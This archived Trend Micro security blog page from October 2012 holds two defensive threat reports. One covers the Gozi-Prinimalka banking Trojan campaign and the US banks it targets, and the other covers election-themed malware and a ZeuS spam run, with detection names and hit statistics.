Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    October 2012
    S M T W T F S
    « Sep   Nov »
  • Email Subscription

  • About Us

    Archive for October 10th, 2012

    Recent reports have stated that a massive campaign of fraud is planned to hit various US banks. Approximately 100 cybercriminals are said to be part of this planned campaign.

    It is believed that this attack will be launched using newly-developed malware related to the Gozi banking Trojan, which has been called Gozi-Prinimalka. Overall, the capabilities of this new threat are broadly similar to other banking malware such as ZeuS, SpyEye, and Gozi itself.

    We’ve been able to analyze the configuration files of existing Gozi-Prinimalka variants that are currently in the wild. Based on this, customers of the following financial institution are at increased risk:

    • Accurint
    • American Funds
    • Ameritrade
    • Bank of America
    • CapitalOne
    • Charles Schwab
    • Chase
    • Citibank
    • eTrade
    • Fidelity
    • Fifth Third Bank
    • HSBC
    • M&T Bank
    • Navy Federal Credit Union
    • PNC
    • Regions Financial Corporation
    • Scottrade
    • ShareBuilder
    • State Employees Credit Union
    • Suntrust
    • The Huntington National Bank
    • United States Automobile Association
    • USBank
    • Wachovia
    • Washington Mutual
    • Wells Fargo
    As we said earlier, we were able to determine the targeted institutions by analyzing the downloaded configuration files. A snippet of these configuration files can be seen by clicking on the thumbnail below; it clearly shows how we were able to determine which sites were at risk, as well as giving insights into the code that is used to modify the sites in question.

    We are in contact with the above financial institutions in order to help mitigate this threat. In the meantime, we advice clients of the institutions listed above to pay particular attention to any wire transfers made out of their accounts, as it is believed that this is how the attack will be conducted by the attackers.

    In the meantime, Trend Micro products detect these Trojans as various BKDR_URSNIF variants, such as BKDR_URSNIF.B. We are also working continuously to find and block any websites that host this malware, as well as any command-and-control servers.

    Posted in Bad Sites, Malware | Comments Off on US Banks Targeted By Fraud Campaign

    Many have watched the U.S. presidential debate last week, and while whether Barack Obama or Mitt Romney won the discussion is still up for debate among netizens, one thing is certain: the presidential campaign is on its last stretch towards the November 6th elections. One other thing that’s certain? Scammers exploiting this to the very end.

    Our researchers have been looking into the data gathered through the global sensors of our Smart Protection Network. Below is a snapshot of election-related keywords that got several hits to malicious sites:

    Keywords # of Hits
    Obama      26,559
    Romney        4,519
    Elections          806
    2012 Elections          358

    Note that these hits are just for the past three months, and we expect it to increase as Election Day draws near. But what stood out for us is the number of hits for both candidates: apparently, when it comes to the number of failed attempts to access a malicious site, Obama gets the users’ vote. And cybercriminals agree: when we checked the number of unique domains blocked since January, there were 4 Obama-related domains for every 1 Romney domain.

    This shouldn’t come as a surprise, given the incumbent President has had at least four years of pop-culture mindshare under his belt compared to Romney. Remember that as early as right after he won the 2008 elections up to his inauguration, Obama was used in several social engineering baits. Going back to the three-month snapshot, it can be seen that hits to Obama has seen its share of highs and lows, while the increase in Romney was consistent around the period when his candidacy was officially announced in August.

    But looking at the type of threats and who the eventual victims were, both candidates are pretty much neck-to-neck. While it is quite obvious that most victims are from the United States and Canada, interestingly, the other top countries include those in Asia and Europe.

    Majority of the hits are from disease vector URLs (i.e., those that eventually download malicious files on computers or host phishing sites) and spam-related, which was consistent with previous election-related threats.

    Several malware have also taken advantage of these two candidates, as we’ve seen file names that range from the curious (Drunken Obama.exe, which we detect as ADW_MARKETSCORE), to the somewhat serious (several PDF files like Romney V. Obama Tax Policies.pdf, which we heuristically detect as HEUR_PDFEXP.E). And apart from the malicious mobile apps we’ve seen several weeks ago, based on our feedback, we’ve also seen infections from a relatively old SOHANAD worm, as well as from other AUTORUN malware (those that usually spread via removable drives) with backdoor capabilities, including the following:

    So what do these tell us? This reinforces the fact that the bad guys have all the bases covered when it comes to exploiting popular events. Whoever wins come November 6th, end users will end up losing in one way or another if they’re not careful. So keep yourself informed. Get your news only from trusted sources, and make sure to have an Internet security solution installed on your devices.

    Update as of October 11, 2012 7:30 AM PDT

    We’ve found a spam run using the election as social engineering bait as well. The email is supposedly from CNN and contains news stories about the election:

    However, instead of news articles, the links lead users to a variant of the ZeuS banking Trojan, delivered by the Blackhole exploit kit. We detect this variant as TSPY_ZBOT.NTW; in addition to blocking the malware we also block the malicious sites that were used by the Blackhole exploit kit in this incident.

    Posted in Bad Sites | Comments Off on Obama vs. Romney: Political (Online) Threats


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice